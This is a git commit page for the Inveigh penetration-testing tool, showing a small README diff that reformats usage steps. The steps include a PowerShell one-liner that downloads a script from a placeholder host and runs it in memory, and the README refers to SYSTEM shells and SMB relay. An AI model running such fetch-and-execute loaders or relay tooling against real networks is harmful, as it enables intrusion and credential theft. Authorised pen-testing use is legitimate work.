diff options
author | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:58:56 -0400 |
---|---|---|
committer | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:58:56 -0400 |
commit | 7b6babb8c6242ee70a12f8d64dfc8a5e58b9adbe (patch) | |
tree | 855337e7d82369c536c450d4cfd35092a7793d05 /README.md | |
parent | 9c0996fee2ee6364fa13c5865f712fdcd3f6d020 (diff) | |
download | Inveigh-7b6babb8c6242ee70a12f8d64dfc8a5e58b9adbe.tar.gz Inveigh-7b6babb8c6242ee70a12f8d64dfc8a5e58b9adbe.zip |
Updated to reflect new module format
Diffstat (limited to 'README.md')
-rw-r--r-- | README.md | 12 |
1 files changed, 5 insertions, 7 deletions
@@ -17,23 +17,21 @@ Tested minimums are PowerShell 2.0 and .NET 3.5 10. SMB relay support is experimental at this point, use caution if employing on a pen test. # Usage -Obtain an elevated administrator or SYSTEM shell. +Obtain an elevated administrator or SYSTEM shell and use a method to load the module -Use a method to load the module: - -To import with Import-Method: +To import with Import-Method: Import-Module ./Inveigh.ps1 -To import with dot source method: +To import with dot source method: . ./Inveigh.ps1 -To load into memory using Invoke-Expression: +To load into memory using Invoke-Expression: IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") To execute with default settings: Invoke-Inveigh -To load and execute with one line: +To load and execute with one line: Import-Module ./Inveigh.ps1;Invoke-Inveigh To execute with features enabled/disabled: |